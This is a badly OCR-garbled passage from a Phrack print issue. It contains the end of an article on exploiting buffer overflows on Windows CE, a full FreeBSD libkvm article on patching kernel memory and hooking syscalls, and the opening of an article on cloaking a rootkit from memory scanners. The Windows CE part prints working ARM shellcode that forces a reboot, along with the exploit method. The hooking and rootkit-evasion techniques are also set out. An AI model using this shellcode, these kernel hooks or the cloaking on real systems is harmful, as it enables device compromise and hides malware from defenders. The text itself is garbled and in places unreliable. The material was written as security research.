IMAGE_EXPORT_DIRECTORYstructure,wecangettheAPI address.IMAGE_EXPORT_DIRECTORY structureisjustlikeotherWin32systems, which defned in winnt.h:www.phrack.orq 2Hacking Windows CE[content omitted, please see electronic version]7 - The Shellcode for Windows CETherearesomethingtonoticebeforewriting shellcode for Windows CE. Windows CE uses r0-r3 as the frst to fourth parameters ofAPI, if theparametersof APIlargerthanfour thatWindowsCEwillusestacktostorethe other parameters. So it will be careful to write shellcode, because the shellcode will stay in the stack. The test.asm is our shellcode:[content omitted, please see electronic version]Thisshellcodeconstructswiththreeparts. Firstly,itcallstheget_export_sectionfunction toobtainthevirtualbaseaddressof coredll anditsvirtualrelativeaddressof exporttable position. The r0 and r1 stored them. Second, it calls the fnd_func function to obtain the APIaddressthroughIMAGE_EXPORT DIRECTORYstructureandstorestheAPI addressestoitsownhashvalueaddress.The lastpartisthefunctionimplementof our shellcode, it changes the register key HKLM\SOFTWARE\WI DCOMM\Gener al \btconfg\StackModeto1andthenuses KernelIoControl to soft restart the system.WindowsCE.NETprovidesBthGetMode andBthSetModetogetandsetthebluetooth state.ButHPIPAQsusetheWidcommstack which has its own API, so BthSetMode cannt openthebluetoothforIPAQ.Well,thereis anotherwaytoopenbluetoothinIPAQs(My PDAisHP1940).JustchangingHKLM\SOFTWARE\WI DCOMM\Gener al \btconfg\StackModeto1andresetthePDA, thebluetoothwillopenaftersystemrestart. This method is not pretty, but it works.Well,letslookattheget_export_section function.WhyIcommentedoff ldrr4, =0xffffc800 instruction? We must notice ARM assemblylanguagesLDRpseudo-instruction. Itcanloadaregisterwitha32-bitconstant valueoranaddress.Theinstructionldrr4, =0xffffc800 will be ldr r4, [pc, #0x108] in EVC debugger, and the r4 register depends on theprogram.Sother4registerwontgetthe 0xffffc800 value in shellcode, and the shellcode will fail. The instruction ldr r5, =0x324 will bemovr5,#0xC9,30inEVCdebugger, itsokwhentheshellcodeisexecuted.The simplesolutionistowritethelargeconstant valueamongtheshellcode,andthenusethe ADR pseudo-instruction to load the address ofvalue to register and then read the memory to register.Tosavesize,wecanusehashtechnologyto encodetheAPInames.EachAPInamewill be encoded into 4 bytes. The hash technology iscomefromLSDsWin32Assembly Components.The compile method is as following:armasm test.asmlink/MACHINE:ARM/SUBSYSTEM:WINDOWSCE test.objYoumustinstalltheEVCenvironmentfrst. After this, we can obtain the necessary opcodes from EVC debugger or IDAPro or hex editors.8 - System CallFirst,letslookattheimplementationof an API in coredll.dll:[content omitted, please see electronic version]Debugging into this API, we found the system will check the KTHRDINFO frst. This value was initialized in the MDCreateMainThread2 functionof PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:...if (kmode || bAllKMode) {pTh->ctx.Psr = KERNEL_MODE;KTHRDINFO (pTh) |= UTLS_INKMODE;www.phrack.orq 27Hacking Windows CE} else {pTh->ctx.Psr = USER_MODE;KTHRDINFO (pTh) &= ~UTLS_INKMODE;}...Ifthe application is in kernel mode, this value willbesetwith1,otherwiseitwillbe0.All applications ofPocket PC run in kernel mode,so the system follow by LDRNE R0, [R4]. Inmyenvironment,theR0got0x8004B138 whichistheppfnMethodspointerofSystemAPISets[SH_WIN32],andthenit fowtoLDRNER1,[R0,#0x13C].Lets looktheoffset0x13C(0x13C/4=0x4F)and corresponding to the index ofWin32Methods defned in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:const PFNVOID Win32Methods[] = {...(PFNVOID)SC_PowerOffSystem, // 79...};Well,theR1gottheaddressof SC_PowerOffSystemwhichisimplemented inkernel.TheinstructionLDREQR1, =0xF000FEC4hasnoeffectwhenthe applicationruninkernelmode.Theaddress 0xF000FEC4 is system call which used by user mode. Some APIs use system call directly, such as SetKMode:.text:01F756C0 EXPORT SetKMode.text:01F756C0 SetKMode.text:01F756C0.text:01F756C0 var_4 = -4.text:01F756C0.text:01F756C0 STR LR, [SP,#var_4]!.text:01F756C4 LDR R1, =0xF000FE50.text:01F756C8 MOV LR, PC.text:01F756CC MOV PC, R1.text:01F756D0 LDMFD SP!, {PC}Windows CE doesnt use ARMs SWI instruction toimplementsystemcall,itimplementsin different way. A system call is made to an invalid address in the range 0xf0000000 - 0xf0010000, andthiscausesaprefetch-aborttrap,which ishandledbyPrefetchAbortimplemented inarmtrap.s.PrefetchAbortwillcheckthe invalidaddressfrst,if itisintrapareathen using ObjectCall to locate the system call and executed,otherwisecallingProcessPrefAbort to deal with the exception.There is a formula to calculate the system call address:0xf0010000-(256*apiset+apinr)*4TheapisethandlesaredefnedinPUBLIC\COMMON\SDK\INC\kfuncs.hand PUBLIC\COMMON\OAK\INC\psyscall.h,andtheaipnrsaredefnedinseveralfles, forexampleSH_WIN32callsaredefnedin PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.Well,letscalculatethesystemcallofKernelIoControl.Theapisetis0andthe apinris99,sothesystemcallis0xf0010000-(256*0+99)*4whichis0xF000FE74.The followingistheshellcodeimplementedby system call:#include stdafx.hint shellcode[] ={0xE59F0014, // ldr r0, [pc, #20]0xE59F4014, // ldr r4, [pc, #20]0xE3A01000, // mov r1, #00xE3A02000, // mov r2, #00xE3A03000, // mov r3, #00xE1A0E00F, // mov lr, pc0xE1A0F004, // mov pc, r40x0101003C, // IOCTL_HAL_REBOOT0xF000FE74, // trap address of KernelIoControl};www.phrack.orq 2BHacking Windows CEint WINAPI WinMain( HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTRlpCmdLine,int nCmdShow){((void (*)(void)) & shellcode)();return 0;}ItworksfneandwedontneedsearchAPI addresses.9 - Windows CE Buffer Overfow ExploitationThe hello.cpp is the demonstration vulnerable program:[content omitted, please see electronic version]Thehellofunctionhasabufferoverfow problem.Itreadsdatafromthebinfleoftherootdirectorytostackvariablebuf by fread().Becauseitreads1KBcontents,soifthe binfle is larger than 512 bytes, the stack variable buf will be overfowed.The printfand getchar are just for test. They havenoeffectwithoutconsole.dllinwindows direcotry.Theconsole.dllfleiscomefrom Windows Mobile Developer Power Toys.ARM assembly language uses bl instruction to call function. Lets look into the hello function:6:int hello()7:{22011000 str lr, [sp, #-4]!22011004 sub sp, sp, #0x89, 308:FILE * binFileH;9:char binFile[] = \\binfile;......26: }220110C4 add sp, sp, #0x89, 30220110C8 ldmia sp!, {pc}strlr,[sp,#-4]!isthefrstinstructionofthehello()function.Itstoresthelrregisterto stack,andthelrregistercontainsthereturn address ofhello caller. The second instruction prepairsstackmemoryforlocalvariables. ldmia sp!, {pc} is the last instruction ofthe hello() function. It loads the return address ofhellocallerthatstoredinthestacktothepc register,andthentheprogramwillexecute intoWinMainfunction.Sooverwritingthelr registerthatisstoredinthestackwillobtain control when the hello function returned.Thevariablesmemoryaddressthatallocated byprogramiscorrespondingtotheloaded Slot, both stack and heap. The process may be loadedintodifferenceSlotateachstarttime. So the base address always alters. We know that the slot 0 is mapped from the current process slot, so the base ofits stack address is stable.The following is the exploit ofhello program:[content omitted, please see electronic version]We choose a stack address ofslot 0, and it points toourshellcode.Itwilloverwritethereturn addressthatstoredinthestack.Wecanalso use a jump address ofvirtual memory space ofthe process instead of. This exploit produces a binflethatwilloverfowthebuf variable and the return address that stored in the stack.AfterthebinflecopiedtothePDA,thePDA restarts and open the bluetooth when the hello programisexecuted.Thatsmeansthehello program fowed to our shellcode.While I changed another method to construct the exploit string, its as following:pad...pad|return address|nop...nop...shellcodeAnd the exploit produces a 1KB binfle. But thePDAisfreezewhenthehelloprogramis executed.Itwasconfused,Ithinkmaybethe stack ofWindows CE is small and the overfow string destroyed the 2KB guard on the top ofstack. It is freeze when the program call a API www.phrack.orq 29Hacking Windows CEafteroverfowoccured.So,wemustnotice thefeaturesof stackwhilewritingexploitfor Windows CE.EVC has some bugs that make debug diffcult. First,EVCwillwritesomearbitrarydatato thestackcontentswhenthestackreleasesat theendof function,sotheshellcodemaybe modifed. Second, the instruction at breakpoint maybechangeto0xE6000010inEVCwhile debugging. Another bug is funny, the debugger withouterrorwhilewritingdatatoa.text addressbystepexecute,butitwillcapturea access violate exception by execute directly.10 - About Decoding ShellcodeTheshellcodewetalkedaboveisaconcept shellcodewhichcontainslotsof zeros.It executed correctly in this demonstate program, butsomeothervulnerableprogramsmaybe flterthespecialcharactersbeforebuffer overfowinsomesituations.Forexample overfowedbystrcpy,theshellcodewillbecut by the zero.Itisdiffcultandinconvenienttowritea shellcodewithoutspecialcharactersbyAPI search method. So we think about the decoding shellcode. Decoding shellcode will convert the specialcharacterstoftcharactersandmake the real shellcode more universal.The newer ARM processor(such as arm9 and arm10)hasaHarvardarchitecturewhich separatesinstructioncacheanddatacache. Thisfeaturewillimprovetheperformanceofprocessor,andmostof RISCprocessorshave this feature. But the self-modifying code is not easytoimplement,becauseitwillpuzzledby the caches and the processor implementationafter being modifed.Lets look at the following code frst:[content omitted, please see electronic version]Thatfourstrbinstructionswillchangethe immediate value ofthe below mov instructions to0x99.Itwillbreakatthatinserted breakpointwhileexecutingthiscodeinEVC debugger directly. The r1-r4 registers got 0x99 inS3C2410whichisaarm9coreprocessor. Itneedsmorenopinstructionstopadafter modifed to let the r1-r4 got 0x99 while I tested this code in my friends PDA which has a Intel Xscaleprocessor.Ithinkthereasonmaybeis thatthearm9has5pipelinesandthearm10 has 6 pipelines. Well , I changed it to another mothed:[content omitted, please see electronic version]Thefourmovinstructionswereencodedby Exclusive-ORwith0x88,thedecoderhasa loop to load a encoded byte and Exclusive-OR itwith0x88andthenstoredittotheoriginal position. The r1-r4 registers wont get 0x1 even you put a lot ofpad instructions after decoded inbotharm9andarm10processors.Ithink maybethattheloadinstructionbringona cache problem.ARMArchitectureReferenceManualhas achaptertointroducehowtodealwithself-modifyingcode.Itsaysthecacheswillbe fushedbyanoperatingsystemcall.Phil,the guyfrom0ddsharedhisexperiencetome. Hesaidhesusedthismethodsuccessfulon ARMsystem(Ithinkhisenviromentmaybeis Linux). Well, this method is successful on AIX PowerPCandSolarisSPARCtoo(Ivetested it).ButSWIimplementsinadifferentway underWindowsCE.Thearmtrap.scontains implementationof SWIHandlerwhichdoes nothing except movs pc,lr. So it has no effect after decode fnished.BecausePocketPCsapplicationsrunin kernel mode, so we have privilege to access the system control coprocessor. ARM Architecture www.phrack.orq 30Hacking Windows CEReference Manual introduces memory system and how to handle cache via the system control coprocessor.Afterlookedintothismanual,I triedtodisabletheinstructioncachebefore decode:mrc p15, 0, r1, c1, c0, 0bic r1, r1, #0x1000mcr p15, 0, r1, c1, c0, 0But the system freezed when the mcr instruction executed.ThenItriedtoinvalidateentire instruction cache after decoded:eor r1, r1, r1mcr p15, 0, r1, c7, c5, 0But it has no effect too.11 - ConclusionThe codes talked above are the real-life buffer overfowexampleonWindowsCE.Itisnot pefect,butIthinkthistechnologywillbe improved in the future.Because ofthe cache mechanism, the decoding shellcode is not good enough.Internetandhandsetdevicesaregrowing quickly,sothreatstothePDAsandmobiles become more and more serious. And the patch ofWindows CE is more diffcult and dangerous than the normal Windows system to customers. BecausetheentireWindowsCEsystemis storedintheROM,if youwanttopatchthe systemfaws,youmustfushtheROM,And the ROM images ofvarious vendors or modes ofPDAs and mobiles arent compatible.12 - GreetingsSpecialgreetstothedudesof XFocusTeam, mygirlfriend,thelifewillfadewithoutyou. Special thanks to the Research Department ofNSFocus Corporation, I love this team. And Ill show my appreciation to 0dd members, Nasiry andFliertoo,thediscussionswiththemwere nice.13 - References[1] ARM Architecture Reference Manual, http://www.arm.com[2] Windows CE 4.2 Source Code, http://msdn.microsoft.com/embedded/windowsce/default.aspx[3] Details Emerge on the First Windows Mobile Virus, Cyrus Peikari, Seth Fogie, Ratter/29A, http://www.informit.com/articles/article.asp?p=337071[4] Pocket PC Abuse - Seth Fogie, http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf[5] misc notes on the xda and windows ce, http://www.xs4all.nl/~itsme/projects/xda/[6] Introduction to Windows CE, http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/[7] Nasiry s way, http://www.cnblogs.com/nasiry/[8] Programming Windows CE Second Edition - Doug Boling[9] Win32 Assembly Components, http://LSD-PL.NEThttp://www.packetstormsecurity.org/Asia / Pakistan http://packetstormsecurity.org.pk/ http://packetstorm.digitallinx.com/Europe /Netherlands http://packetstormsecurity.nl/ http://packetstorm.dyn.org/ http://packetstorm.casandra.org/Europe / United Kingdom http://packetstorm.linuxsecurity.com/Europe / Germany http://packetstorm.security-guide.de/Europe / France http://packetstorm.icx.fr/ http://packetstorm.digital-network.net/North America / East Coast http://packetstorm.setnine.com/North America / Central Region http://packetstorm.blackroute.net/ http://packetstorm.troop218.org/ http://packetstorm.orion-hosting.co.uk/ http://packetstormsecurity.org.uk/South America / Argentina http://packetstorm.usrrback.com/South America / Chile http://packetstorm.rlz.cl/SECURITY WITHOUT BOUNDARIESwww.phrack.orq 32Playing Games With Kernel Memory...FreeBSD StylePlaying Games with kernel Memory...FreeBSD StyleJoseph Kong 1.0 - IntroductionThe kernel memory interface or kvm interface wasfrstintroducedinSunOS.Althoughit hasbeenaroundforquitesometime,many peoplestillconsiderittoberatherobscure. Thisarticledocumentsthebasicusageof the Kernel Data Access Library (libkvm), and will explore some ways to use libkvm (/dev/kmem) inordertoalterthebehaviorof arunning FreeBSD system.FreeBSDkernelhackingskillsof amoderate level (i.e. you know how to use ddb), as well as a decent understanding ofC and x86 Assembly (AT&TSyntax)arerequiredinorderto understand the contents ofthis article.This article was written from the perspective ofa FreeBSD 5.4 Stable System.Note: Although the techniques described in this article have been explored in other articles (see References),theyarealwaysfromaLinuxor Windows perspective. I personally only know ofone other text that touches on the information containedherein.ThattextentitledFun andGameswithFreeBSDKernelModules byStephanieWehnerexplainedsomeof the thingsonecandowithlibkvm.Considering the fact that one can do much more, and that documentationregardinglibkvmisscarce (manpagesandsourcecodeaside),Idecided to write this article.2.0 - Finding System CallsNote:Thissectionisextremelybasic,if you haveagoodgraspof thelibkvmfunctions readthenextparagraphandskiptothenext section.StephanieWehnerwroteaprogramcalled checkcall, which would check ifsysent[CALL] hadbeentamperedwith,andif sowould change it back to the original function. In order tohelpwiththedebuggingduringthelatter sectionsof thisarticle,wearegoingtomake use ofcheckcalls fnd system call functionality. Followingisastrippeddownversionofcheckcall, with just the fnd system call function. It is also a good example to learn the basics oflibkvm from. A line by line explanation ofthe libkvm functions appears after the source code listing.fnd_syscall.c:[content omitted, please see electronic version]Therearefvefunctionsfromlibkvmthatare included in the above program; they are:kvm_openfileskvm_nlistkvm_geterrkvm_readkvm_closekvm_openfles:Basically kvm_openfles initializes kernel virtual memory access, and returns a descriptor to be usedinsubsequentkvmlibrarycalls.Infnd_syscall the syntax was as follows:kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);kdisusedtostorethereturneddescriptor,ifwww.phrack.orq 33Playing Games With Kernel Memory...FreeBSD StyleafterthecallkdequalsNULLthenanerror has occurred.The frst three arguments correspond to const char *execfle, constchar *corefle, and const char*swapflesrespectively.Howeverforour purposestheyareunnecessary,henceNULL. Thefourthargumentindicatesthatwewant read/write access. The ffth argument indicates which bufferto place any error messages, more on that later.kvm_nlist:Themanpagestatesthatkvm_nlistretrieves the symbol table entries indicated by the name listargument(structnlist).Themembersofstruct nlist that interest us are as follows:/* symbol name (in memory) */char *n_name;/* address of the symbol*/unsigned long n_value; Priortocallingkvm_nlistinfnd_syscalla struct nlist array wassetup as follows:struct nlist nl[] = { { NULL }, { NULL }, { NULL }, };nl[0].n_name = sysent;nl[1].n_name = argv[1];The syntax for calling kvm_nlist is as follows:kvm_nlist(kd, nl)What this did was fll out the n_value member ofeach element in the array nl with the starting address in memory corresponding to the value inn_name.Inotherwordswenowknowthe locationinmemoryof sysentandtheuser supplied syscall (argv[1]). nl was initialized with three elements because kvm_nlist expects as its second argument a NULL terminated array ofnlist structures.kvm_geterr:As stated in the man page this function returns astringdescribingthemostrecenterror condition.If youlookthroughtheabove source code listing you will see kvm_geterr gets called after every libkvm function, except kvm_openfles.kvm_openflesusesitsownunique formof errorreporting,becausekvm_geterr requiresadescriptorasanargument,which would not exist ifkvm_openfles has not been calledyet.Anexampleusageof kvm_geterr follows:fprintf(stderr, ERROR: %s\n, kvm_geterr(kd));kvm_read:Thisfunctionisusedtoreadkernelvirtual memory.Infnd_syscallthesyntaxwasas follows:kvm_read(kd, addr, &call, sizeof(struct sysent))The frst argument is the descriptor. The second is the address to begin reading from. The third argument is the user-space location to store the data read. The fourth argument is the number ofbytes to read.kvm_close:Thisfunctionbreakstheconnectionbetween thepointerandthekernelvirtualmemory established with kvm_openfles. In fnd_syscall this function was called as follows:kvm_close(kd)The following is an algorithmic explanation offnd_syscall.c:1. Check to make sure the user has supplied asyscallnameandnumber.(Noerror checking, just checks for two arguments)2. Setupthearrayof nliststructures appropriately.3. Initializekernelvirtualmemoryaccess. (kvm_openfles)www.phrack.orq 34Playing Games With Kernel Memory...FreeBSD Style4. Findtheaddressof sysentandtheuser supplied syscall. (kvm_nlist)5. Calculatethelocationof thesyscallin sysent.6. Copythesyscallssysentstructurefrom kernel-space to user-space. (kvm_read)7. Print out the location ofthe syscall in the sysentstructureandthelocationof the executed function.8. Close the descriptor (kvm_close)Inordertoverifythattheoutputof fnd_syscallisaccurate,onecanmakeuseof ddb as follows:Note: The output below was modifed in order to meet the 75 character per line requirement.[content omitted, please see electronic version]3.0-UnderstandingCallStatementsAndBytecode InjectionIn x86 Assembly a Call statement is a control transferinstruction,usedtocallaprocedure. Therearetwotypesof CallstatementsNear andFar,forthepurposesof thisarticleone onlyneedstounderstandaNearCall.The following code illustrates the details ofa Near Call statement (in Intel Syntax):0200BB1295MOV BX,95120203E8FA00CALL 03000206B82F14MOV AX,142FIntheabovecodesnippet,whentheIP (Instruction Pointer) gets to0203 it will jump to0300.Thehexadecimalrepresentationfor CALL is E8, however FA00 is not 0300. 0x300 - 0x206 = 0xFA. In a near call the IP address ofthe instruction after the Call is saved on the stack, so the called procedure knows where to returnto.Thisexplainswhytheoperandfor Call in this example is 0xFA00 and not 0x300. This is an important point and will come into play later.Oneof themoreentertainingthingsonecan dowiththelibkvmfunctionsispatchkernel virtual memory. As always we start with a very simple example ... Hello World! The following is a kld which adds a syscall that functions as a Hello World! program.hello.c:[content omitted, please see electronic version]The following is the user-space program for the above kld:interface.c:#include #include #include #include int main(int argc, char **argv) {return syscall(210);}If wecompiletheabovekldusingastandard Makefle,loadit,andthenruntheuser-space program,wegetsomeveryannoyingoutput. In order to make this syscall less annoying we canusethefollowingprogram.Asbeforean explanation ofany new functions and concepts appears after thesource code listing.test_call.c:[content omitted, please see electronic version]Theonlylibkvmfunctionthatisincludedin theaboveprogramthathasntbeendiscussed before is kvm_write.kvm_write:This function is used to write to kernel virtual memory. In test_call the syntax was as follows:kvm_write(kd, nl[0].n_value, code, sizeof(code))Thefrstargumentisthedescriptor.The second is the address to begin writing to. The www.phrack.orq 3bPlaying Games With Kernel Memory...FreeBSD Stylethirdargumentistheuser-spacelocationto read from. The fourth argument is the number ofbytes to read.Thereplacementcode(bytecode)intest_call was generated with help ofobjdump.[content omitted, please see electronic version]Note:Youroutputmayvarydependingon your compiler version and fags.Comparing the output ofthe text section with the bytecode in test_call one can see that they are essentially the same, minus setting up nine more calls to printf. An important item to take note ofis when objdump reports something as being relative. In this case two items are; movl $0x5ed,(%esp) (sets up the string to be printed) and call printf. Which brings us to ...Intest_calltherearetwo#defnestatements, they are:#define OFFSET_10xed#define OFFSET_20x12The frst represents the address ofthe string to beprintedrelativetothebeginningof syscall hello(thenumberisderivedfromtheoutput ofobjdump). While the second represents the offsetof theinstructionfollowingthecallto printf inthebytecode.Lateronintest_call there are these four statements:/* Calculate the correct offsets */offset_1 = nl[0].n_value + OFFSET_1;offset_2 = nl[0].n_value + OFFSET_2;/* Set the code to contain the correct addresses */*(unsigned long *)&code[9] = offset_1;*(unsigned long *)&code[14] = nl[1].n_value - offset_2;From the comments it should be obvious what these four statements do. code[9] is the section in bytecode where the address ofthe string to be printed is stored. code[14] is the operand for thecallstatement;addressof printf -address ofthe next statement.Thefollowingistheoutputbeforeandafter running test_call:[content omitted, please see electronic version]4.0 - Allocating Kernel MemoryBeing able to just patch kernel memory has its limitations since you dont have much room to play with. Being able to allocate kernel memory alleviatesthisproblem.Thefollowingisakld which does just that.kmalloc.c:[content omitted, please see electronic version]The following is the user-space program for the above kld:interface.c:[content omitted, please see electronic version]Usingthetechniques/functionsdescribedin theprevioustwosectionsandthefollowing algorithmcoinedbySilvioCesareonecan allocatekernelmemorywithouttheuseof a kld.SilvioCesareskmallocfromuser-space algorithm:1. Get the address ofsome syscall2. Write a function which will allocate kernel memory3. Savesizeof(our_function)bytesof some syscall4. Overwrite some syscall with our_function5. Call newly overwritten syscall6. Restore syscalltest_kmalloc.c:www.phrack.orq 3Playing Games With Kernel Memory...FreeBSD Style[content omitted, please see electronic version]Usingddbonecanverifytheresultsof the above program as follows:[content omitted, please see electronic version]5.0 - Putting It All TogetherKnowinghowtopatchandallocatekernel memorygivesonealotof freedom.This lastsectionwilldemonstratehowtoapplya callhookusingthetechniquesdescribedin theprevioussections.Typicallycallhookson FreeBSD are done by changing the sysent and havingitpointtoanotherfunction,wewill not be doing this. Instead we will be using the followingalgorithm(withafewminortwists, shown later):1. Copy syscall we want to hook2. Allocatekernelmemory(usetechnique described in previous section)3. Placenewroutineinnewlyallocated address space4. Overwritefrst7bytesof syscallwithan instruction to jump to new routine5. Execute new routine, plus the frst x bytes of syscall(thisstepwillbecomeclearer later)6. Jump back to syscall + offset, Where offset is equal to xStealinganideafrompragmaticof THCwe will hook mkdir to print out a debug message. Thefollowingisthekldusedinconjunction with objdump in order to extract the bytecode required for the call hook.hacked_mkdir.c:[content omitted, please see electronic version]Thefollowingisanexampleprogramwhich hooksmkdirtoprintoutasimpledebug message. As always an explanation ofany new concepts appears after the source code listing.test_hook.c:[content omitted, please see electronic version]The comments state that the algorithm for this program is as follows:1. Copy mkdir syscall upto but not including \xe8.2. Allocate kernel memory.3. Placenewroutineinnewlyallocated address space.4. Overwritefrst7bytesof mkdirsyscall withaninstructiontojumptonew routine.5. Execute new routine, plus the frst x bytes ofmkdir syscall. Where x is equal to the number ofbytes copied from step 1.6. Jump back to mkdir syscall + offset. Where offset is equal to the location of\xe8.The reason behind copying mkdir upto but not including \xe8 is because on different builds ofFreeBSDthedisassemblyof themkdirsyscall is different. Therefore one cannot determine a staticlocationtojumpbackto.However,on allbuildsof FreeBSDmkdirmakesacallto kern_mkdir,thuswechoosetojumpbackto that point. The following illustrates this.[content omitted, please see electronic version]Theaboveoutputwasgeneratedfromtwo differentFreeBSD5.4builds.Asonecan clearlysee the dissassemblydumpof mkdiris different for each one.Intest_hooktheaddressof kern_rmdiris soughtafter,thisisbecauseinmemorykern_rmdir comes right after mkdir, thus its address is the end boundary for mkdir.The bytecode for the call hook is as follows:[content omitted, please see electronic version]www.phrack.orq 37Playing Games With Kernel Memory...FreeBSD StyleThe frst 20 bytes is for the string to be printed, because ofthis when we jump to this function wehavetostartatanoffsetof 0x14,as illustrated from this line ofcode:*(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14;The last three statements in the hacked_mkdir bytecodezerosouttheeaxregister,cleansup the stack, and restores the ebp register. This is donesothatwhenmkdiractuallyexecutesits as ifnothing has already occurred.One thing to remember about character arrays inCisthattheyareallnullterminated.For example ifwe declare the following variable,unsigned char example[] = \x41;sizeof(example) will return 2. This is the reason why in test_hook we subtract 1 from sizeof(ha_code),otherwisewewouldbewritingtothe wrong spot.Thefollowingistheoutputbeforeandafter running test_hook:[content omitted, please see electronic version]Onecouldalsousefnd_syscallandddbto verify the results oftest_hook6.0 - Concluding RemarksBeingabletopatchandallocatekernel memorygivesonealotof powerovera system. All the examples in this article are trivialasitwasmyintentiontoshow the how not the what. Other authors have better ideas than me anyways on what to do (see References).Iwouldliketotakethisspaceto apologize ifany ofmy explanations are unclear, hopefully reading over the source code and looking at theoutput makes up for it.Finally,IwouldliketothankSilvioCesare, pragmatic,andStephanieWehner,forthe inspiration/ideas.7.0 - References[1]SilvioCesare,RuntimeKernelKmem Patchinghttp://reactor-core.org/runtime-kernel-patching.html[2]devik&sd,Linuxon-th-fykernel patchingwithoutLKMhttp://www.phrack.org/show.php?p=58&a=7[3]pragmatic,AttackingFreeBSDwith KernelModuleshttp://www.thc.org/papers/bsdkern.html[4]Andrew Reiter, Dynamic Kernel Linker (KLD)FacilityProgrammingTutorial http://ezine.daemonnews.org/200010/blueprints.html[5]Stephanie Wehner, Fun and Games with FreeBSDKernelModuleshttp://www.r4k.net/mod/fbsdfun.html[6]MuhammadAliMazidi&Janice GillispieMazidi,The80x86IBMPC AndCompatibleComputers:Assembly Language,Design,AndInterfacing (Prentice Hall)www.phrack.orq 3BRaising The Bar For Windows Rootkit DetectionRaising The Bar For Windows Rootkit DetectionJamie Butler and Sherri Sparks 0 - Introduction & BackgroundRootkitshavehistoricallydemonstrateda co-evolutionaryadaptationandresponseto thedevelopmentof defensivetechnologies designed to apprehend their subversive agenda. Ifwe trace the evolution ofrootkit technology, this pattern is evident.First generation rootkits wereprimitive.Theysimplyreplaced/ modifed key system fles on the victims system. TheUNIXloginprogramwasacommon targetandinvolvedanattackerreplacingthe originalbinarywithamaliciouslyenhanced versionthatloggeduserpasswords.Because theseearlyrootkitmodifcationswerelimited tosystemflesondisk,theymotivatedthe developmentof flesystemintegritycheckers such as Tripwire [1]. Inresponse,rootkitdevelopersmovedtheir modifcationsoff disktothememoryimages of theloadedprogramsand,again,evaded detection. These second generation rootkits were primarily based upon hooking techniques thatalteredtheexecutionpathbymaking memorypatchestoloadedapplicationsand someoperatingsystemcomponentssuchas the system call table. Although much stealthier, suchmodifcationsremaineddetectableby searchingforheuristicabnormalities.For example, it is suspicious for the system service table to contain pointers that do not point to the operating system kernel. This is the technique used by VICE [2]. Third generation kernel rootkit techniques like Direct Kernel Object Manipulation (DKOM), whichwasimplementedintheFUrootkit [3],capitalizeontheweaknessesof current detectionsoftwarebymodifyingdynamically changing kernel data structures for which it is impossible to establish a static trusted baseline. 0.1 - MotivationsTherearepublicrootkitswhichillustrateall ofthese various techniques, but even the most sophisticatedWindowskernelrootkits,like FU,possessaninherentfaw.Theysubvert essentiallyallof theoperatingsystems subsystemswithoneexception:memory management.Kernelrootkitscancontrolthe execution path ofkernel code, alter kernel data, andfakesystemcallreturnvalues,butthey have not (yet) demonstrated thecapability to hook or fake the contents ofmemory seen by other running applications.In other words, www.phrack.orq 39Raising The Bar For Windows Rootkit Detectionpublickernelrootkitsaresittingducksforin memory signature scans.Only now are security companies beginning to think ofimplementing memory signature scans.Hidingfrommemoryscansissimilartothe problemfacedbyearlyvirusesattemptingto hideontheflesystem.Viruswritersreacted to anti-virus programs scanning the fle system by developing polymorphic and metamorphic techniques to evade detection.Polymorphism attemptstoalterthebinaryimageof avirus byreplacingblocksof codewithfunctionally equivalentblocksthatappeardifferent(i.e. usedifferentopcodestoperformthesame task).Polymorphiccode,therefore,altersthe superfcial appearance ofa block ofcode, but it does not fundamentally alter a scanners view ofthat region ofsystem memory.Traditionally,therehavebeenthreegeneral approachestomaliciouscodedetection: misusedetection,whichreliesuponknown codesignatures,anomalydetection,which relies upon heuristics and statistical deviations from normal behavior, and integrity checking which relies upon comparing current snapshots of theflesystemormemorywithaknown, trustedbaseline.Apolymorphicrootkit (orvirus)effectivelyevadessignaturebased detectionof itscodebody,butfallsshortin anomaly or integrity detection schemes because itcannoteasilycamoufagethechangesit makes to existing binary code in other system components.Nowimaginearootkitthatmakesnoeffort tochangeitssuperfcialappearance,yetis capableof fundamentallyalteringadetectors viewof anarbitraryregionof memory. Whenthedetectorattemptstoreadany regionof memorymodifedbytherootkit,it seesanormal,unalteredviewof memory. Only the rootkit sees the true, altered view ofmemory.Sucharootkitisclearlycapableofcompromisingallof theprimarydetection methodologiestovaryingdegrees.The implicationstomisusedetectionareobvious. Ascannerattemptstoreadthememoryfor theloadedrootkitdriverlookingforacode signatureandtherootkitsimplyreturnsa random,fakeviewof memory(i.e.which doesnotincludeitsowncode)tothescanner. Therearealsoimplicationsforintegrity validationapproachestodetection.Inthese cases, the rootkit returns the unaltered view ofmemory to all processes other than itself.The integrity checker sees the unaltered code, fnds amatchingCRCorhash,and(erroneously) assumesthatalliswell.Finally,anyanomaly detection methods which rely upon identifying deviant structural characteristics will be fooled sincetheywillreceiveanormalviewof the code.Anexampleof thismightbeascanner likeVICEwhichattemptstoheuristically identify inline function hooks by the presence ofa direct jump at the beginning ofthe function body.Current rootkits, with the exception ofHacker Defender[4],havemadelittleornoeffortto introduceviralpolymorphismtechniques.As statedpreviously,whileavaluabletechnique, polymorphism is not a comprehensive solution to the problem for a rootkit because the rootkit cannoteasilycamoufagethechangesitmust maketoexistingcodeinordertoinstallits hooks.Ourobjective,therefore,istoshow proofofconcept that the current architecture permitssubversionof memorymanagement suchthatanonpolymorphickernelmode rootkit(orvirus)iscapableof controllingthe view ofmemory regions seen by the operating systemandotherprocesseswithaminimal performancehit.Theendresultisthatit ispossibletohideaknownpublicrootkit driver (for which a code signature exists) from detection.Tothisend,wehavedesignedan enhanced version ofthe FU rootkit. In section 1, we discuss the basic techniques used to detect www.phrack.orq 40Raising The Bar For Windows Rootkit Detectionarootkit.Insection2,wegiveabackground summaryof thex86memoryarchitecture. Section3outlinestheconceptof memory cloaking and proofofconcept implementation for our enhanced rootkit.Finally, we conclude with a discussion ofits detectability, limitations, futureextensibility,andperformanceimpact. Without further ado, we bid youwelcome to 4th generation rootkit technology.1 - Rootkit DetectionUntilseveralmonthsago,rootkitdetection was largely ignored by security vendors. Many mistakenlyclassifedrootkitsinthesame category as other viruses and malware. Because ofthis, security 